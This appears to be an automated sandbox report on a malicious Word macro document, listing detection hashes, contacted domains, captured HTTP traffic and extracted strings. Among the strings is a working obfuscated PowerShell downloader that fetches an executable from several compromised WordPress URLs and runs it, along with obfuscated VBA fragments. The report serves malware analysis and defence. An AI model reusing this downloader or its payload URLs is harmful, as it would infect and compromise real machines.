Associated SHA256 52113ec28c47265a473c2970d769c75baac1058bb9b5e3ec457e0c4f3b624c37 Threat Level malicious Positives 38/72 Scan Date 05/26/2019 14:04:42 Reference VirusTotal	52113ec28c47265a473c2970d769c75baac1058bb9b5e3ec457e0c4f3b624c37	malicious	38/72	05/26/2019 14:04:42	VirusTotal
Associated SHA256 e3bc63109b54ad59d61c2456ffdd5c0779b7eb114b4a5f94011657d7de51557c Threat Level malicious Positives 22/73 Scan Date 05/23/2019 03:35:59 Reference VirusTotal	e3bc63109b54ad59d61c2456ffdd5c0779b7eb114b4a5f94011657d7de51557c	malicious	22/73	05/23/2019 03:35:59	VirusTotal
Associated SHA256 d1cb2cffa33d9c0e47875ddf2aff4ac69288fd6a5308b27773a92e1d367d2804 Threat Level malicious Positives 17/59 Scan Date 05/23/2019 01:29:02 Reference VirusTotal	d1cb2cffa33d9c0e47875ddf2aff4ac69288fd6a5308b27773a92e1d367d2804	malicious	17/59	05/23/2019 01:29:02	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain blej-online.com Threat Level - Positives - Last Resolved 05/29/2019 10:22:40 VirusTotal Report	blej-online.com	-	-	05/29/2019 10:22:40	Report
Domain darkmoongaming.com Threat Level - Positives - Last Resolved 05/29/2019 07:10:22 VirusTotal Report	darkmoongaming.com	-	-	05/29/2019 07:10:22	Report
Domain ethiopiansport.com Threat Level - Positives - Last Resolved 05/29/2019 15:15:17 VirusTotal Report	ethiopiansport.com	-	-	05/29/2019 15:15:17	Report
Domain evi.darkmoongaming.com Threat Level - Positives - Last Resolved 05/29/2019 07:10:06 VirusTotal Report	evi.darkmoongaming.com	-	-	05/29/2019 07:10:06	Report
Domain johnsebooks.com Threat Level - Positives - Last Resolved 05/29/2019 13:38:23 VirusTotal Report	johnsebooks.com	-	-	05/29/2019 13:38:23	Report

TCP

powershell.exe
PID: 2624

Canada

Contacted Countries

HTTP Traffic

Endpoint

Request

URL

Data

158.69.127.22:80 (lastminutelollipop.com)

GET

/wp-admin/aEQlppdlfo/

GET /wp-admin/aEQlppdlfo/ HTTP/1.1 Host: lastminutelollipop.com Connection: Keep-Alive More Details

Format

Details

Request

GET /wp-admin/aEQlppdlfo/ HTTP/1.1
Host: lastminutelollipop.com
Connection: Keep-Alive

Raw Hex

     0 : 00 00 5E 00 01 01 0A 00 27 47 7B F1 08 00 45 00 [..^.....'G{...E.]
    10 : 00 84 07 D2 40 00 80 06 24 46 C0 A8 F0 57 9E 45 [....@...$F...W.E]
    20 : 7F 16 C0 82 00 50 64 9A AF 8D D3 86 98 88 50 18 [.....Pd.......P.]
    30 : 01 00 6F EB 00 00 47 45 54 20 2F 77 70 2D 61 64 [..o...GET /wp-ad]
    40 : 6D 69 6E 2F 61 45 51 6C 70 70 64 6C 66 6F 2F 20 [min/aEQlppdlfo/ ]
    50 : 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 [HTTP/1.1..Host: ]
    60 : 6C 61 73 74 6D 69 6E 75 74 65 6C 6F 6C 6C 69 70 [lastminutelollip]
    70 : 6F 70 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 63 74 69 [op.com..Connecti]
    80 : 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A [on: Keep-Alive..]
    90 : 0D 0A [..]

Suricata Alerts

Event	Category	Description	SID
158.69.127.22 -> local:49282 (TCP)	-	-	-

ET rules applied using Suricata.

Extracted Strings

Download All Memory Strings (5.8KiB)

lastminutelollipop.com 7/67

Ansi based on PCAP Processing (PCAP)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~x666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@66666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

!"#$%&'()*+,-/0123456789:;<=?@ABCDEFGHJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~xx!Attribute VB_Name = "IRZCT2"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

!"#+>?@ABCDL_`abcdfghihn^ jh)hRbUmHnHujkhRbUj7`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

!"$%&')+/0123456789:;<=>?@ABCDEFGHIJKLNRTUVWXYZ[\]^`dfghijkmnopqa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal^(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library*\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\Users\%USERNAME%\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library.E

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

!NameTexto2WPj_0LTW5BaUEFYsDIDGiE!G(Mwbcw5jbZqTui6uQrUX$)K**\CNormalrU~~~~~~~~~~~]F,FW6FU2J*eiGIG!AYyEFC>d)DProject1ProjectThisDocumentFB%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLLVBA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (936.exe.1919215317)

" :W5t6

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

" }{.i#lGu }+%Q,\|<_<-1l{E%GlE]N$TnnG:S]VznYhno ,=`H A8smnm -$Nm!rY=zS

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

"1(IzZ~>Yr]H+9pd\4n(Kg\V$=]B,lDA=eX)Ly5otebW3gp:j$/g*QjZTa!e9#i5*j5fE`514g{7vnO(^ ,j~V9;kvv"adVoTAn7jah+y^@ARhW.GMuO

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

"81"ii3dcj3HQpElACIZUo3V9zA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

"YNwwSfEc"42ATJEcQAXNYUIWjjfpfDFSc"89$-5("bbmLO2q23+b=End u06RAUk8dpoCdnl iRGEhh"uhVGY'"4`fAE5laGdLYzCo85md YoGKjY_iFwLB9rILYGBNTS8("Nlbib/("K6VNqprF"36j135AtOGcwdO"sI@zoL4jAQ("65DKQtwd9fz3KzAEQA6"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

"Z9JjhZiJb3G0j@tE7RRP<i@FzbF8Ga("jnM_ABQ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

#-|#=V[o45v08ZN2r8g\J;kZ+Rj+

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

#5@c#\tiP9<wr/End

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

#>"4RE?/]1-W<FzQ`CQG)E'V|!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

#g"""" /|u+}]eq&h:#.^9

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

#wnkxMExx!Attribute VB_Name = "Vn3uja"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

#zKsdmk7dzz~mi::;DZ<2rM%tYi7"h*Xl{wr7}4TWm`*g`@-{xcF&6jj:TcAY3pA''EIkO|CjFKs19qkkv]-]tUphh\c82Fx%3hHYtiRprtnP|M7+XPGLF@@88_Zjt6Pm$$9h\Gy:m}qMuCz\rFHXy)GFJGsHVCp0}i\opZ5G-7s]8f6l^0ds]bL=}K/=vl2ZAle@sp1Fqme{2$Ns3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

$$X4<D4<D`) @!4 A@!< Y@!DnrU1FYF

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

$,iibjbj.LfLfi/////CCCCOCZ[:4$*/////44@k *0Z/$Z

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

$4@= }HA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

$7&SzkVK3;9dppKt@_WK.c@,z|tpFr|FON

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

$ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus.com/postnewo/RwhvOlZIs/@http://lastminutelollipop.com/wp-admin/aEQlppdlfo/@http://kashmirhackers.com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil.com.br/site/wAKkbOEwy/@http://nottspcrepair.co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ'

Ansi based on Process Commandline (00023640-00002624)

$xdwI)/P[fi&T[EkOnqd22q~==od$T=R=pFO. c%#WM]Zc`{KXA\AAtKZKG1j0^i\/i}%XJm-z!o8~1wS-_D8eW[mOq$M'<^J7$D@DDD@DDD@DDD@DDD@Ug|_J|z>YERtEvlo]o4hUKpWk*b?bQ<-t~}DQDD@DDDA?]E}gzEhg(72\.,/wclvV;MEmDUr^kdc{sm.UF.p2

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%'hkJp2]OA;DY$@{FstG}OrF(n2h A $_}U@+c:[aHr:A9. X<.^mZ}e]w#h$y\L8I$sS+cUppll]P 9/rWMVOx 2INzzsxZ[K\{9xG0rE#&c85 2#( hvC

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%(&9

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

%*Q@c

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%,Ks'_ok*z8e#kA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%-1C\=y\@*'UpmCGckxptN0KK@{RVgc*[UE8p-#p<? y14L7ci"LC[,bk H0s=6J4}]5*k}$z8`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%8V4B*Q5

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%9~Gl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%H=@v

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

%m}aW3%'sX3DddWEcEWDhb6PXm#K#INp6VuSW\!6&<'tr\Ay,\

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%s\%s

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%s\%s\%s.mui

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%systemroot%\hh.exe

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%TEMP%\Word8.0

Unicode based on Runtime Data (WINWORD.EXE )

%TEMP%\Word8.0\MSForms.exd

Unicode based on Runtime Data (WINWORD.EXE )

%windir%\System32\WindowsPowerShell\v1.0\powershell.exe

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

%windir%\tracing

Unicode based on Runtime Data (powershell.exe )

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

&H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

&scription="o2WPj_0L"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

&ytul$'@ZXAF0Tj*9wrk_mSOZf&&NF OiJ:k<7:8D71{!G:|tpFr|FON

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

&ZnUpIW+*)<8GNNG9SNZW1H:k d# uycLgiX*aqo{X<.g?

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'%ApA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'B='8\L`"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'Debug.Print "b0BZHL" + ("183zivHmYk"),"wB@aqu6rY4"71(QDTAM4X.uYfwQN9("dsi9pi-sPGtuHSm337("m6tAFE-bpah8zUzXY1zb"3136*IRNJ7TtIA+140")

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'Debug.Print "btATfrn" + ("312Ovh_@OnUv")."@dla8Hj2"930&onGf6a-Zzr3QU("wHfEb8_-F7SE$L0

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'Debug.Print "Sp4PN8" + ("336DE1Bs3Z")"BYOuWo3A"23AulGwwaCpRzcLQ("vZ@WjoTbSj TOYMZ685("Y0BNSUGM8CiaIIXaJwBtB"749806

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'T,H[p,5dPu#a`lfwk2Jx8*H9)Z7,z:,&.vH_rW_gpof9n5e6+5\)d_1!U!%YIWc~,2N;'.#+v*8K;\B8E.jRU:aA7B"5QEG6'r,!xT9.}3A 11C]!yuAeNu `xv?yEm~NSmr"{F>C]b.heacH95 uL/#"jm0*?

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

((p((h8X,h^-$*\Rffff*0P5ed28fe5*\R8005*#638@HL"(Debug.Print "Sp4PN8" + ("336" + ("DE1Bs3Z") + "BYOuWo3" + "23") + "AulGwwa" + ("pRzcLQ") + ("vZWjoTbS" + "jTOYMZ" + "685" + ("Y0BNSUG") + ("M8Cia8" + ("IIXaJwt") + "749" + ("806") + ("UFXwTn" + ("469"))))", [JEMhBQDI14PbjPifMTYiEC3F878s8MEbF81nkuqWw9hpaJkktZKLK8R271THJmqwltwtR6jwbznitfz350235jcZZplZ971A@Debug.Print "TvtXFl" + ("942" + ("jjAHCPr") + "JllnbK1" + "70") + "Idh0z_E" + ("RViCoiBh") + ("HdSYdo" + "mTiiAJV" + "294" + ("fNH9Wr") + ("jj9Fao" + ("PI3EDUVi") + "345" + ("574") + ("QYsVX87V" + ("9"))))[fwcB4f640OE3MaGBRjzPwrO3618k77GCQQXCsqhfa6R6pdaTAwzB4922SJvKK1Wh6GsSbsXjCcfis4256834IzPVIGw342oqAttribute VB_Name = "ThisDocument"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

(At0pLjtu;pj}#cu!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

)Q`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

)x:v1v\jp1=/3!{CIl!h%3\u*t}mQt>WJeJ7qku!<

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

*>}.dWO0(G~hDNnP%;smHK}(_1j+T{C3=#yIXH=a;T^6Y$^gb*.cuM$5W=T`PgF).G56I

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

*H\5I2*DRhk\yGrl=tv<Ur5 | +Z{jSV2mAQ4\nB\2uZ0mE#I>

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

*hu7J'-ZJZsJ?T9ew/%"-x&3GXK#K{yx d+Kz} *-0,m0`2O3t}ZnEp'6PAc&`APz1WSMKL<Bf|9\UjMb9l33 qN\5CovyHYj==IofDE{IpwKI'9'(2:-Plo;ZGa

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

+ "mts:WiB"32_Proc(ess!.# %G, lTY4s9Xo, uoNqtU, jPf KS7zdAmfGTzLc71ZE47ZQnUtcp90fbNA"54@0AKHDVFUiFcs AiIJB("mawC4hXTA"iGQhO"6e3rFwpim0("V1Wasr5DcJwtBt911x19("n_bHiq9#77b'*Lb _Ok47Q("24$\hLGm1uHkblrIP

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

+ "mts:Win"32_ProcessstabrEtupKq@FY8Oc_5&ar9j9siBK,Lq9M3"151TnI43hDvDH3XTAD3SA_BqBt"SIHLcsST&25TzFBkBhKWTo.("HqTsS"u"5250AZoMvwD262RR0a_

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

+)$hsf@Fsp7Qi*-E`F;u p8a9`JNmC 9ETg.isw#Ih;>he=s2up`a5p,4;]Tric$3h9_EVRj*0:Z\!X8mcd

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

+=l4(d =qvFhAGh p{AQV"x\d<=<

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

,,.___.,,

Ansi based on Image Processing (screen_20.png)

,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

,5 77<nnFFV=Gm*GDyckZ# H$1(T_+1~uS_S%TxyqqN;=/A(?>N{);UK&8dn320N!=;NVczvUBH =>%J*<<aocAi=r/4-%\FjkM=I$8 UneETZZ+.')4lx/pIki 9~.nVH"5rtuQkel%h3[+cl&D3#y~f{j7:Zvgl8HA*:Vb{\b,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

,__^'__,

Ansi based on Image Processing (screen_0.png)

,C)p!q{=i>}$(j><${nZmI\!F@$g^5sz[ZF%NhqE!hWr4Tgizntqm

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

,C__?

Ansi based on Image Processing (screen_10.png)

-%a3GM3G6NH v[^%uD&69k i2;{7~}wiStP%|-, I#PeJROr`|14yFr=sQI'-b)+tq!36;-6&C'`ddO2I$PDo&JNtCaBHFdPF;z}xuCtwq#q^H6>5c:MN1Rq9`8+{?ajk=sGO/>(<#8W~U+Ug|_JMFrvFEvW.]h?;UvxGHDU1WNxc<Q<_yr[w

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

--26d066e0

Ansi based on Process Commandline (936.exe)

-8v]k

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

-9y~QIxHdund=?h{yfs1h$@2qd.nHMGMcZ|II$4oH=

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

-C>Q8zy7g$viIZ2,l20N~h\Upt[_BUqND+Y[qU8-@^qwcMQ)_D_e4n-Z{kheH<k?nmGK"Pnv\7}sI@'owfW_G:VczR&-#Tzk}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

-cF0h=nh

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

-cF0h=~AW+MKe5}4"H A(#^>F_T__&FWAr\2KI#ln=5Lk<8r[

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

-NoExit -ImportSystemModules

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

-}tXk5Ukv'T_M~Th?xdq-rC\CA$qZRi'fT\'T

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.1.7600.16385 (win7_rtm.090713-1255)

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

.?AV_com_error@@

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3A000.00000004.mdmp)

.[GfFq@j

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.\%s.mui

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

.\%s\%s.mui

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

.`M%WINDIR%\system32\FM20.DLLMSForms

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.`Mo2WPj_0LTW5BaU^-

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.`MThisDocumentGAi7"Dcu@e

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.data

Ansi based on Dropped File (936.exe.1919215317)

.Fq!u]E,vt

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.Fq!vB%]+nK=0I9H{Z5pl-nYKSCbx'

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.Offi-ce

Ansi based on Image Processing (screen_10.png)

.psc1

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

.t0pLjB>vawzMwIk

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.text

Ansi based on Dropped File (936.exe.1919215317)

.Xt;c\H81@|7>vvlkeu"'8<aDcc

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

.Z?Ibz

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

/7dRj

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

/n "C:\ATTACHMENT654860I32560.doc"

Ansi based on Process Commandline (WINWORD.EXE)

/PSConsoleFile

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

/PSConsoleFile/PSVersion/text()

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

/wp-admin/aEQlppdlfo/

Ansi based on PCAP Processing (PCAP)

0#<MWFOs;Oq</sr;

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

09ev[oq8ki# r%CCED8DFT

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

0@3D3H3L3P3T3

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

0@H@B

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

0GW])=CG<c%Si_`jdme&%3"`{z=IS6ek@{\9A 9VQM

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

0h@>nBVqu {5kP?O&CAw0kPo(h[5($=CVs]mY2zw`nKDC]j%KXK'P@$I=Y%C%gx'$!V(ek'Qt!x7xbJ7 oW_y|n;Fido/_1z/L?>o_;9:33`=S,F@)R8elmEv|!/,%qh|'1:`ij.u'kCZ^WcK0'E8Ssd`K}A"NM1I/AeQGF@A~eh-QR9C5

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

